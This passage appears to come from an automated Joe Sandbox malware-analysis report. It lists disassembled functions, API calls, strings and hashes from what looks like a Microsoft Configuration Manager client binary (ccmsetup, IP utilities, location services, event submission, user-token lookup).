                                                                                            • Part of subcall function 00676FC8: GetCurrentThreadId.KERNEL32 ref: 0067702F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0067684F
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006766D3
                                                                                          • Failed to retrieve adapter information., xrefs: 006765B8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067652F
                                                                                          • (pInfo) != 0, xrefs: 006764AF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00676582
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067653C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006764B4
                                                                                          • Adapter %s is DHCP enabled. Checking quarantine status., xrefs: 00676657
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067683F
                                                                                          • IsValidIpv4Address((pAddr->IpAddress).String, bv4), xrefs: 006766CE
                                                                                          • Obtained %d IPv4 addresses., xrefs: 006767AC
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00676524
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 00676577
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067685B
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006764C1
                                                                                          • IsValidIpv4Address((pAddr->IpAddress).String, bv4), xrefs: 00676845
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 0067658F
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006766C8
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006766E4
                                                                                          • CcmUtilLib::GetIPV4AddressInformation, xrefs: 00676420
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0067684A
                                                                                          • ..\CcmIPUtil.cpp, xrefs: 006764A9
                                                                                          • GetAdaptersInfo(pInfo, &ulSize), xrefs: 0067657D
                                                                                          • dwRet, xrefs: 0067652A
                                                                                          • Failed to check if the address is v4 (0x%08x), xrefs: 0067671D
                                                                                          • Failed to check if the address is v4 (0x%08x), xrefs: 00676894
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$AdaptersH_prolog3_catch_Info
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pInfo) != 0$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$..\CcmIPUtil.cpp$Adapter %s is DHCP enabled. Checking quarantine status.$CcmUtilLib::GetIPV4AddressInformation$Failed to check if the address is v4 (0x%08x)$Failed to check if the address is v4 (0x%08x)$Failed to retrieve adapter information.$GetAdaptersInfo(pInfo, &ulSize)$IsValidIpv4Address((pAddr->IpAddress).String, bv4)$IsValidIpv4Address((pAddr->IpAddress).String, bv4)$Obtained %d IPv4 addresses.$dwRet
                                                                                          • API String ID: 263454988-3015325420
                                                                                          • Opcode ID: cfc65f1fb0e378d483c25d1d3999c2be3a9db23c5cfa6008000553a97e28b505
                                                                                          • Instruction ID: 80ec8549196ebb64e7ab88d856720e1d2096699edd0570b83aefe76071f4291e
                                                                                          • Opcode Fuzzy Hash: cfc65f1fb0e378d483c25d1d3999c2be3a9db23c5cfa6008000553a97e28b505
                                                                                          • Instruction Fuzzy Hash: 55D1C171D41269AAEB20DB61CC49BEEBBB9BB45704F1080D9F50CB7281D7B49B84CF61
                                                                                          Function 00589401 Relevance: 47.8, APIs: 7, Strings: 20, Instructions: 551threadfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058940B
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005A7D95: __EH_prolog3_catch.LIBCMT ref: 005A7D9C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005894C7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005895B4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00589696
                                                                                            • Part of subcall function 00605EB4: __EH_prolog3_catch_GS.LIBCMT ref: 00605EBB
                                                                                            • Part of subcall function 00605EB4: GetCurrentThreadId.KERNEL32 ref: 00605F0E
                                                                                            • Part of subcall function 0057D3CB: __EH_prolog3_catch_GS.LIBCMT ref: 0057D3D5
                                                                                            • Part of subcall function 0057D3CB: GetCurrentThreadId.KERNEL32 ref: 0057D46F
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005897CC
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00589901
                                                                                          • FindClose.KERNEL32(00000000), ref: 0058991F
                                                                                          Strings
                                                                                          • 4?k, xrefs: 0058961E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00589691
                                                                                          • %, xrefs: 00589AF2
                                                                                          • 4[k, xrefs: 00589BBD
                                                                                          • ccmsetup.cpp, xrefs: 005895A4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005894C2
                                                                                          • The manifest has no files that require download or installation., xrefs: 00589BCB
                                                                                          • ., xrefs: 00589804
                                                                                          • ccmsetup.cpp, xrefs: 0058969E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005895AF
                                                                                          • File '%s' is a local file. No need to download., xrefs: 00589633
                                                                                          • GetFileNameFromQualifiedPath( sFileName, sPackageName ), xrefs: 0058968C
                                                                                          • client.msi, xrefs: 005896DC, 00589707
                                                                                          • oSetupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, 0, &bLocal , xrefs: 005895AA
                                                                                          • oSetupManifest.GetInstallListCount( iFileCount ), xrefs: 005894BD
                                                                                          • ccmsetup.cpp, xrefs: 00589686
                                                                                          • ccmsetup.cpp, xrefs: 005894B7
                                                                                          • ccmsetup.cpp, xrefs: 005895BC
                                                                                          • CcmSetup::GetDownloadFileList, xrefs: 00589467
                                                                                          • ccmsetup.cpp, xrefs: 005894CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FindH_prolog3_catch_$File$CloseFirstH_prolog3H_prolog3_catchNext
                                                                                          • String ID: %$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$.$4?k$4[k$CcmSetup::GetDownloadFileList$File '%s' is a local file. No need to download.$GetFileNameFromQualifiedPath( sFileName, sPackageName )$The manifest has no files that require download or installation.$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$client.msi$oSetupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, 0, &bLocal $oSetupManifest.GetInstallListCount( iFileCount )
                                                                                          • API String ID: 2004009170-3969336629
                                                                                          • Opcode ID: b3012a099b823f9b9d6c4afc2ca89a3167d80101192b9f5fd272991b85ede751
                                                                                          • Instruction ID: 39f8cbab141685144ea87e92018b21199adfe65602c3dce89e19b62bb69f6e7f
                                                                                          • Opcode Fuzzy Hash: b3012a099b823f9b9d6c4afc2ca89a3167d80101192b9f5fd272991b85ede751
                                                                                          • Instruction Fuzzy Hash: EE32BA71904259EBDB22EBA4CD49BEEBBB8BF51300F1440D9E549B7182DB745B88CF21
                                                                                          Function 00651144 Relevance: 114.2, APIs: 18, Strings: 47, Instructions: 439threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065114E
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 00609759: __EH_prolog3.LIBCMT ref: 00609760
                                                                                            • Part of subcall function 00609949: __EH_prolog3.LIBCMT ref: 00609950
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651252
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651300
                                                                                          • EnterCriticalSection.KERNEL32(0093A408,00000000,?,//ClientLocationInfo,00000008,CCM::LocationServices::CcmGetBoundaryGroupCacheToXml,?,0001-01-01 00:00:00.000,000000A4,0064C910,00000000,?,?,00000008,?,00000000), ref: 00651328
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006513AC
                                                                                          • LeaveCriticalSection.KERNEL32(0093A408,BoundaryGroupGUIDs,?,BoundaryGroupIDs,?,CacheToken,?,BoundaryGroupCache=@,00000000,00000000,root\ccm\LocationServices,00000001,00000000,00000000,00000000,?), ref: 006513D9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065142B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651488
                                                                                            • Part of subcall function 006100EB: SafeArrayDestroy.OLEAUT32(?), ref: 006100F7
                                                                                            • Part of subcall function 0060B823: __EH_prolog3_catch.LIBCMT ref: 0060B82A
                                                                                            • Part of subcall function 0060B823: GetCurrentThreadId.KERNEL32 ref: 0060B886
                                                                                          • LeaveCriticalSection.KERNEL32(0093A408,root\ccm\LocationServices,00000001,00000000,00000000,00000000,?,//ClientLocationInfo,00000008,CCM::LocationServices::CcmGetBoundaryGroupCacheToXml,?,0001-01-01 00:00:00.000,000000A4,0064C910,00000000,?), ref: 006514C4
                                                                                            • Part of subcall function 0061013A: __EH_prolog3_catch.LIBCMT ref: 00610141
                                                                                            • Part of subcall function 0061013A: GetCurrentThreadId.KERNEL32 ref: 00610197
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651587
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006515A8
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006515B4
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 006515BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00651600
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065165D
                                                                                          • SysFreeString.OLEAUT32(?), ref: 006516FB
                                                                                          • SysFreeString.OLEAUT32(?), ref: 00651707
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00651710
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$FreeString$H_prolog3$CriticalSection$H_prolog3_catchLeave$ArrayDestroyEnterH_prolog3_catch_Safe
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$..\lsutils.cpp$//ClientLocationInfo$0001-01-01 00:00:00.000$BoundaryGroup$BoundaryGroupCache=@$BoundaryGroupFlags$BoundaryGroupGUIDs$BoundaryGroupIDs$BoundaryGroupListRetrieveTime$BoundaryGroups$CCM::LocationServices::CcmGetBoundaryGroupCacheToXml$CacheToken$GroupFlag$GroupGUID$GroupID$doc$parentElement$root\ccm\LocationServices$saBoundaryGroupFlags.getBstr(i, &bsGroupFlag)$saBoundaryGroupGUIDs.getBstr(i, &bsGroupGUID)$saBoundaryGroupIDs.getBstr(i, &bsGroupID)$spBoundaryGroupCache.GetArray(c_szBGCacheGUIDs, &saBoundaryGroupGUIDs)$spBoundaryGroupCache.GetArray(c_szBGCacheIDs, &saBoundaryGroupIDs)$spBoundaryGroupCache.GetString(c_szBGCacheToken, sCacheToken)
                                                                                          • API String ID: 2822274989-2751417708
                                                                                          • Opcode ID: b476b6d76b5f0d28ae32fa4f50d232f02862ac8e536c2e4226e84e9571c956bf
                                                                                          • Instruction ID: 161754766485c64aa337c63ce0c9411e6c6d078e21f900d149d7c4a9fd3b3d91
                                                                                          • Opcode Fuzzy Hash: b476b6d76b5f0d28ae32fa4f50d232f02862ac8e536c2e4226e84e9571c956bf
                                                                                          • Instruction Fuzzy Hash: 1802D330D40258EADF15EBA4CD49BEDBF76BF15700F148099E449BB2D2DBB44A48CB61
                                                                                          Function 006120C3 Relevance: 110.6, APIs: 12, Strings: 51, Instructions: 374threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006120CD
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612159
                                                                                            • Part of subcall function 0060158F: __EH_prolog3_catch.LIBCMT ref: 00601596
                                                                                            • Part of subcall function 0060158F: GetCurrentThreadId.KERNEL32 ref: 006015F3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006121C2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061228D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612300
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612362
                                                                                          • CoCreateGuid.OLE32(?,CCM_PendingEvent,00000000,00000000,CCM\Events,00000000,00000000,?,00000001,?,?,?,?,CCMHTTPPORT,CcmSetup::CalculateParameters,000000FC), ref: 00612378
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006123AD
                                                                                            • Part of subcall function 005F3F81: __EH_prolog3_catch_GS.LIBCMT ref: 005F3F8B
                                                                                            • Part of subcall function 005F3F81: StringFromGUID2.OLE32(00000064,00000008,00000032,CCM::Utility::String::String,0000008C,005C9BC7,?), ref: 005F3FD1
                                                                                            • Part of subcall function 005F3F81: GetCurrentThreadId.KERNEL32 ref: 005F3FFE
                                                                                            • Part of subcall function 005F3F81: __CxxThrowException@8.LIBCMT ref: 005F4086
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061242A
                                                                                            • Part of subcall function 006095D1: VariantClear.OLEAUT32(?), ref: 006095DE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00612477
                                                                                            • Part of subcall function 006038EF: __EH_prolog3_catch.LIBCMT ref: 006038F6
                                                                                            • Part of subcall function 006038EF: GetCurrentThreadId.KERNEL32 ref: 00603953
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006124D0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061251D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catchH_prolog3_catch_$ClearCreateException@8FromGuidStringThrowVariant
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$..\Event.cpp$CCM::Utility::SubmitCcmPendingEvent$CCM\Events$CCM_Event$CCM_PendingEvent$CoCreateGuid(&gEventID)$Event$EventID$EventID$Failed to submit pending event to WMI.$Raising pending event:%s$Successfully submitted pending event to WMI.$h'w$pEvent != 0$pEvent->InheritsFrom(c_szCcmEventClass) == ((HRESULT)0L)$spNamespace.CreateInstance( c_szCcmPendingEventClass, &spPendingEvent )$spNamespace.Open( c_szEventingNamespace, false, 0, (uFlags & CcmEvent_UseAdminLocator) != 0 )$spNamespace.PutInstance(spPendingEvent)$spPendingEvent.Set(L"Event", vValue)$spPendingEvent.SetString(L"EventID", String(gEventID))$spPendingEvent.SetString(L"EventID", pszEventID)$vValue.setUnknown(pEvent)
                                                                                          • API String ID: 232579505-4074030258
                                                                                          • Opcode ID: bc774df8a47a71f89073e43c0ca2c56b68e38accfb32de3c5a0e4ffd6fe7b51d
                                                                                          • Instruction ID: 6f47b14ca61cda52dc0a46215d8394a5c46382251f69e6541f489d61233b1ee1
                                                                                          • Opcode Fuzzy Hash: bc774df8a47a71f89073e43c0ca2c56b68e38accfb32de3c5a0e4ffd6fe7b51d
                                                                                          • Instruction Fuzzy Hash: B1D1E9B0D40355AADF21DBA4CD1AFEE7F7AAF51B44F188049F504A7283C7785A46CB60
                                                                                          Function 00614247 Relevance: 105.4, APIs: 19, Strings: 41, Instructions: 361threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061424E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006142B3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614313
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614352
                                                                                          • ConvertStringSidToSidW.ADVAPI32(?,?), ref: 00614379
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006143A9
                                                                                          • WTSEnumerateSessionsW.WTSAPI32(00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614420
                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614429
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061445F
                                                                                          • WTSQueryUserToken.WTSAPI32(?,00000000,00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\), ref: 006144D7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614548
                                                                                          • CloseHandle.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000001,00000000,?,00000000,00000000,00000000), ref: 00614584
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006145C3
                                                                                          • CloseHandle.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000001,00000000,?,00000000,00000000,00000000), ref: 0061460E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00614648
                                                                                          • CloseHandle.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00000000,00000001,?,?,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001), ref: 006146A1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006146F3
                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000002,00000000,00000000,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614724
                                                                                          • WTSFreeMemory.WTSAPI32(00000000,00000000,00000002,00000000,00000000,?,CCM::Utility::Security::GetUserTokenFromSid,0000005C,0061CF00,00000002,00000001,00000000,000000FF,User\,CcmUtilLib::GetWPJCert,00000078), ref: 00614733
                                                                                          Strings
                                                                                          • ..\usertoken.cpp, xrefs: 0061431F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00614643
                                                                                          • ..\usertoken.cpp, xrefs: 00614342
                                                                                          • ..\usertoken.cpp, xrefs: 0061444F
                                                                                          • ..\usertoken.cpp, xrefs: 006146FB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006146EE
                                                                                          • CCM::Utility::Security::GetUserTokenFromSid, xrefs: 0061426C
                                                                                          • ..\usertoken.cpp, xrefs: 006145CB
                                                                                          • ::WTSEnumerateSessions( WTS_CURRENT_SERVER_HANDLE, 0, 1, &pSessions, &dwCount), xrefs: 00614455
                                                                                          • NULL != *phToken, xrefs: 0061463E
                                                                                          • ..\usertoken.cpp, xrefs: 006142BF
                                                                                          • ..\usertoken.cpp, xrefs: 006145B3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061434D
                                                                                          • GetElevatedToken(shUserToken, phToken), xrefs: 0061453E
                                                                                          • phToken, xrefs: 00614348
                                                                                          • ..\usertoken.cpp, xrefs: 00614303
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061430E
                                                                                          • ConvertStringSidToSid(szUserSid, &pSid), xrefs: 0061439F
                                                                                          • Tkw, xrefs: 006143C7
                                                                                          • ..\usertoken.cpp, xrefs: 006146E3
                                                                                          • ..\usertoken.cpp, xrefs: 00614550
                                                                                          • ..\usertoken.cpp, xrefs: 006143B1
                                                                                          • GetRestrictedToken(shUserToken, phToken), xrefs: 006145B9
                                                                                          • szUserSid, xrefs: 006142A9
                                                                                          • ..\usertoken.cpp, xrefs: 00614467
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00614543
                                                                                          • ..\usertoken.cpp, xrefs: 006142A3
                                                                                          • L'\0' != szUserSid[0], xrefs: 00614309
                                                                                          • ..\usertoken.cpp, xrefs: 0061435E
                                                                                          • ..\usertoken.cpp, xrefs: 00614638
                                                                                          • User sid %s is invalid., xrefs: 006143D4
                                                                                          • Could not enumerate terminal server sessions, 0x%x, xrefs: 00614495
                                                                                          • ..\usertoken.cpp, xrefs: 00614538
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006145BE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006142AE
                                                                                          • ..\usertoken.cpp, xrefs: 00614650
                                                                                          • ..\usertoken.cpp, xrefs: 00614399
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061445A
                                                                                          • GetLoggedOnUserToken(dwSessionId, fGetElevatedToken, phToken, 0), xrefs: 006146E9
                                                                                          • GetuserTokenFromSid, couldn't find logon session for user sid %s, xrefs: 00614673
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006143A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseHandle$Free$ConvertEnumerateErrorH_prolog3_catch_LastLocalMemoryQuerySessionsStringTokenUser
